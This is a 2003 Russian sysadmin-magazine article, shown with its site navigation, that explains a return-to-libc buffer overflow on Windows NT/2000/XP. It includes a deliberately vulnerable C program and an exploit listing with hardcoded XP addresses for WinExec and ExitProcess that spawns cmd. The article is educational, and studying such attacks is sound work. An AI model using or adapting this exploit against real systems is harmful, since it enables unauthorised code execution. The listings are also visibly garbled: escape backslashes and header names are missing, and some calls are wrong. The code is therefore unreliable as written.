Атака на переполнение буфера через неисполнимый стек в Windows NT/2000/XP::Журнал СА 9.2003
www.samag.ru
     
Поиск   
              
 www.samag.ru    Web  0 товаров , сумма 0 руб.
E-mail
Пароль  
 Запомнить меня
Регистрация | Забыли пароль?
Журнал "Системный администратор"
Журнал «БИТ»
Подписка
Архив номеров
Где купить
Наука и технологии
Авторам
Рекламодателям
Контакты
   

  Опросы
  Статьи

Дата-центры  

Дата-центры: есть ли опасность утечки данных?

Российские компании уже несколько лет испытывают дефицит вычислительных мощностей. Рост числа проектов,

 Читать далее...

Книжная полка  

Защиты много не бывает

Среди книжных новинок издательства «БХВ» есть несколько изданий, посвященных методам социальной инженерии

 Читать далее...

Событие  

В банке рассола ждет сисадмина с полей фрактал-кукумбер

Читайте впечатления о слете ДСА 2024, рассказанные волонтером и участником слета

 Читать далее...

Организация бесперебойной работы  

Бесперебойная работа ИТ-инфраструктуры в режиме 24/7 Как обеспечить ее в нынешних условиях?

Год назад ИТ-компания «Крок» провела исследование «Ключевые тренды сервисного рынка 2023». Результаты

 Читать далее...

Книжная полка  

Читайте и познавайте мир технологий!

Издательство «БХВ» продолжает радовать выпуском интересных и полезных, к тому же прекрасно

 Читать далее...

СУБД PostgreSQL  

СУБД Postgres Pro

Сертификация по новым требованиям ФСТЭК и роль администратора без доступа к данным

 Читать далее...

Критическая инфраструктура  

КИИ для оператора связи. Готовы ли компании к повышению уровня кибербезопасности?

Похоже, что провайдеры и операторы связи начали забывать о требованиях законодательства

 Читать далее...

Архитектура ПО  

Архитектурные метрики. Качество архитектуры и способность системы к эволюционированию

Обычно соответствие программного продукта требованиям мы проверяем через скоуп вполне себе понятных

 Читать далее...

Как хорошо вы это знаете  

Что вам известно о разработках компании ARinteg?

Компания ARinteg (ООО «АРинтег») – системный интегратор на российском рынке ИБ –

 Читать далее...

Графические редакторы  

Рисование абстрактных гор в стиле Paper Cut

Векторный графический редактор Inkscape – яркий представитель той прослойки open source, с

 Читать далее...

День сисадмина  

Учите матчасть! Или как стать системным администратором

Лето – время не только отпусков, но и хорошая возможность определиться с профессией

 Читать далее...

День сисадмина  

Живой айтишник – это всегда движение. Остановка смерти подобна

Наши авторы рассказывают о своем опыте и дают советы начинающим системным администраторам.

 Читать далее...

Виртуализация  

Рынок решений для виртуализации

По данным «Обзора российского рынка инфраструктурного ПО и перспектив его развития», сделанного

 Читать далее...

Книжная полка  

Как стать креативным и востребованным

Издательский дом «Питер» предлагает новинки компьютерной литературы, а также книги по бизнесу

 Читать далее...

1001 и 1 книга  
19.03.2018г.
Просмотров: 6426
Комментарии: 0
Машинное обучение с использованием библиотеки Н2О

 Читать далее...

12.03.2018г.
Просмотров: 7125
Комментарии: 0
Особенности киберпреступлений в России: инструменты нападения и защита информации

 Читать далее...

12.03.2018г.
Просмотров: 4407
Комментарии: 0
Глубокое обучение с точки зрения практика

 Читать далее...

12.03.2018г.
Просмотров: 3093
Комментарии: 0
Изучаем pandas

 Читать далее...

12.03.2018г.
Просмотров: 3887
Комментарии: 0
Программирование на языке Rust (Цветное издание)

 Читать далее...

19.12.2017г.
Просмотров: 3906
Комментарии: 0
Глубокое обучение

 Читать далее...

19.12.2017г.
Просмотров: 6392
Комментарии: 0
Анализ социальных медиа на Python

 Читать далее...

19.12.2017г.
Просмотров: 3239
Комментарии: 0
Основы блокчейна

 Читать далее...

19.12.2017г.
Просмотров: 3537
Комментарии: 0
Java 9. Полный обзор нововведений

 Читать далее...

16.02.2017г.
Просмотров: 7370
Комментарии: 0
Опоздавших не бывает, или книга о стеке

 Читать далее...

17.05.2016г.
Просмотров: 10729
Комментарии: 0
Теория вычислений для программистов

 Читать далее...

30.03.2015г.
Просмотров: 12450
Комментарии: 0
От математики к обобщенному программированию

 Читать далее...

18.02.2014г.
Просмотров: 14110
Комментарии: 0
Рецензия на книгу «Читаем Тьюринга»

 Читать далее...

13.02.2014г.
Просмотров: 9199
Комментарии: 0
Читайте, размышляйте, действуйте

 Читать далее...

12.02.2014г.
Просмотров: 7147
Комментарии: 0
Рисуем наши мысли

 Читать далее...

10.02.2014г.
Просмотров: 5453
Комментарии: 3
Страна в цифрах

 Читать далее...

18.12.2013г.
Просмотров: 4687
Комментарии: 0
Большие данные меняют нашу жизнь

 Читать далее...

18.12.2013г.
Просмотров: 3501
Комментарии: 0
Компьютерные технологии – корень зла для точки роста

 Читать далее...

04.12.2013г.
Просмотров: 3215
Комментарии: 0
Паутина в облаках

 Читать далее...

03.12.2013г.
Просмотров: 3452
Комментарии: 0
Рецензия на книгу «MongoDB в действии»

 Читать далее...

02.12.2013г.
Просмотров: 3095
Комментарии: 0
Не думай о минутах свысока

 Читать далее...

Друзья сайта  

 Атака на переполнение буфера через неисполнимый стек в Windows NT/2000/XP

Архив номеров / 2003 / Выпуск №9 (10) / Атака на переполнение буфера через неисполнимый стек в Windows NT/2000/XP

Рубрика: Безопасность /  Угрозы

СТАНИСЛАВ ГОШКО

Атака на переполнение буфера

через неисполнимый стек в Windows NT/2000/XP

Атаки на переполнение буфера за последние 10 лет получили громадное распространение. Практически во всех современных операционных системах предусматривается защита от данных атак (Black Cat, Sun...). Поэтому не за горами то время, когда данная защита появится и у Windows-систем. В данной статье будет рассматриваться атака на переполнение буфера через неисполнимый стек.

Рассмотрим, чем отличается обычное переполнение буфера от переполнения буфера через неисполнимый стек.

Большинство атак на переполнение буфера строятся по следующей схеме:

  • Подготавливается мусор и вычисляются номера байтов, которые перетирают адрес возврата.
  • Подготавливается исполнимый код в качестве буфера.
  • Вычисляется адрес возврата при помощи отладчика, так, чтобы он указывал на исполнимый код в стеке.
  • Затем подготовленный буфер, содержащий мусорные байты, новый адрес возврата и исполнимый код передаются уязвимой программе.

Рассмотрим на схеме, как выглядит стек уязвимой программы в момент проведения обычной атаки на срыв стека:

Рисунок 1

Как вы могли заметить, исполнение shell-кода происходит прямо в стеке. Большинство защит ориентировано на то, чтобы воспрепятствовать выполнению кода в стеке, и данная защита очень хорошо работает против большинства эксплоитов.

Теперь для понимания функционирования эксплоитов, использующих атаку через неисполнимый стек, рассмотрим простую программу, которая вызывает через WinExec программу – «cmd.exe».

На языке С++ она бы выглядела так:

#include

void main ()

{

    WinExec("cmd",1);

}

В данной программе не видно вызова функции ExitProcess, так как компилятор C++ сам заботится о корректном завершении программы.

Рассмотрим аналогичную программу на языке ассемблера:

.386                           

.model flat, stdcall                                         

extrn ExitProcess:proc         

extrn WinExec:proc                              

.data                          

dd 0                                                         

.code                         

start:                                                

           push   1

           push   offset comm1

           call   WinExec                    ; !!!!!     

           push   0                         

           call   ExitProcess                                                          

           comm1  db "cmd",0

end start                                 

end

Теперь нам необходимо разобраться, как выглядит стек внутри функции WinExec. Рассмотрим схему стека внутри WinExec (вызов данной функции отмечен восклицательными знаками).

Рисунок 2  

Для построения нашей атаки нам наиболее важны значения, отмеченные восклицательными знаками. Первый же параметр можно упустить.

Перейдём к конструированию нашей атаки. Мы должны так переполнить буфер, чтобы при возвращении из функции мы попали прямиком в WIN API-функцию с заполненным стеком. И самое главное, что стек должен быть заполнен корректно для вызова cmd.exe.

Разберём схему построения данной атаки:

  • Подготавливается имя программы («cmd»), мусор и вычисляются номера байтов, которые перетирают адрес возврата.
  • Вычисляется адрес строки при помощи отладчика так, чтобы он указывал на строку «cmd» в стеке.
  • Вычисляются адреса функций: WinExec, ExitProcess.
  • Затем подготовленный буфер, содержащий имя программы («cmd»), мусорные байты, новый адрес строки и адреса функций, передаётся уязвимой программе.

Рассмотрим схему стека при реализации данной атаки:

Рисунок 3

Как вы можете видеть по схеме стека, в момент атаки мы упустили первый параметр функции WinExec. А также мы поставили адрес функции ExitProcess в качестве адреса возврата из функции WinExec. После того, как консоль будет запущена, управление будет передано на функцию ExitProcess, которая корректно завершит процесс.

Теперь рассмотрим простую уязвимую программу и построим для неё эксплоит, работающий через неисполнимый стек.

Рассмотрим листинг:

#include

#include

void vuln_func(char *stroka)

{

    // буфер

    char buffer[256];  

    // функция в результате вызывающая переполнение буфера

    lstrcpyA(buffer,stroka);

}

void main (int argc, char *argv[])

{

    // вызов уязвимой функции

    vuln_func(argv[1]);

    printf("Parameter is : %s",argv[1]);

}

Откомпилируем её и выясним, что эта программа делает. Если её запустить без параметров, то она выведет следующее:

Parameter is : 0(null)

Запустим её следующим образом:

c:x-files-ug.exe aaaaaaa

Тогда данная программа выведет:

Parameter is : aaaaaaa

При «aaaaa....aaaa» в количестве больше чем 256 будет происходить переполнение буфера.

Теперь, когда у нас есть уязвимая программа, мы можем реализовать эксплоит для неё, который будет действовать по описанному выше принципу.

Рассмотрим листинг эксплоита:

// example exploit by sl0n 

#include

#include

void main()

{

    char garbage[1000];

    char buffer[500];

    char r_address1[8]="xC6x84xE6x77";         // адрес функции WinExec для WIN XP

    char r_address2[8]="xB5x5CxE7x77";         // адрес функции ExitProcess для WIN XP

    char pointer_to_cmd[8]="x80xfax12x00";     // адрес строки "cmd" в стэке

    memset(garbage,"x90",256);                    // Заполняем строку мусором (nop)

    strcat(buffer,"cmd ");                         // "cmd "

    strcat(buffer,garbage);                        // "cmd "+nop

    strcat(buffer,r_address1);                     // "cmd "+nop+WinExec

    strcat(buffer,r_address2);                     // "cmd "+nop+WinExec+ExitProcess

    strcat(buffer,pointer_to_cmd);                 // "cmd "+nop+WinExec+ExitProcess+....

    strcpy(garbage,"BUG.EXE ");

    strcat(garbage,buffer);

    //"BUG.EXE "+"cmd "+nop"ы+WinExec+ExitProcess+point_cmd 

    WinExec(buffer,1);

}

Как вы могли убедиться, для реализации данной атаки не нужно глубокое знание ассемблера для построения shell-кода. Она гораздо легче реализуется, чем традиционное переполнение буфера. Данный вид атаки на переполнение буфера гораздо более прогрессивный, но существует некоторая сложность построения удалённых эксплоитов данного типа.

По-моему, данная атака представляет собой второе дыхание эксплоитов, ориентированных на переполнение буфера.

Для борьбы с атаками данного вида системные администраторы должны с большим вниманием следить за обновлением программного обеспечения.

При написании статьи использовались материалы:

  1. Non-stack Based Exploitation of Buffer Overrun Vulnerabilities on Windows NT/2000/XP by David Litchfield (david@ngssoftware.com).

Комментарии отсутствуют

Добавить комментарий

Комментарии могут оставлять только зарегистрированные пользователи

               Copyright © Системный администратор

Яндекс.Метрика
Tel.: (499) 277-12-45
E-mail: sa@samag.ru